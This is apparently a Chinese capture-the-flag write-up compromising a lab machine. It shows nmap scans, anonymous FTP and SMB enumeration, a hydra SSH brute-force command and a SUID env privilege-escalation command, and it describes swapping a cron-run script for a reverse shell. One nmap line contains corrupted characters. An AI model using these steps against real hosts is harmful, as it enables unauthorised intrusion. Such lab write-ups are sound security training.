端口扫描

sudo nmap --min-rate 10000 -p- 10.10.55.65
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 11:30 UTC
Nmap scan report for 10.10.55.65
Host is up (0.27s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds
sudo nmap -sT -sV -sC -O -p21,22,139,445 10.10.55.65
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 11:30 UTC
Nmap scan report for 10.10.55.65
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.38.245
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open p^˷▒V Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-11-28T11:31:10
|_ start_date: N/A
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2023-11-28T11:31:10+00:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.00 seconds

FTP匿名登陆

根据房间名字合理想象可以ftp匿名登陆,果然

ftp 10.10.55.65
wget -m --no-passive ftp://anonymous:anonymous@10.10.55.65

直接下载所有文件

找到一个脚本:

#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

但是目前看来这个脚本并没有什么用

SMB扫描

smbmap -H 10.10.55.65

________ ___ ___ _______ ___ ___ __ _______

/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \

(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------

SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.55.65:445 Name: 10.10.55.65 Status: Authenticated
Disk Permissions Comment

---- ----------- -------

​ print$ NO ACCESS Printer Drivers
​ pics READ ONLY My SMB Share Directory for Pics
​ IPC$ NO ACCESS IPC Service (anonymous server (Samba, Ubuntu))

发现一个pics共享

smbclient //10.10.55.65/pics

也是可以匿名连接,发现两张图片,全部下载,但是也没有什么用

用enum4linux -a也可以进行枚举,得到一个namelessone用户

Getshell

hydra -l namelessone -P /usr/share/wordlists/rockyou.txt ssh://10.10.55.65

先试着爆破一下用户,显然是爆破不出来的

看看房间提示,之前ftp得到的那个日志文件似乎是可以利用的,这个脚本虽然我们不能通过执行来利用,但是我们可以上传一个同名的反弹shell来替换执行,因为又是计划任务可以执行

开启监听,上传反弹shell,得到shell

提权

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

也是直接找SUID,发现一个env,根据GTFOBINS

/usr/bin/env /bin/bash -p

也是直接提权

碎碎念

好久没打靶机了,正好打个简单的复健一下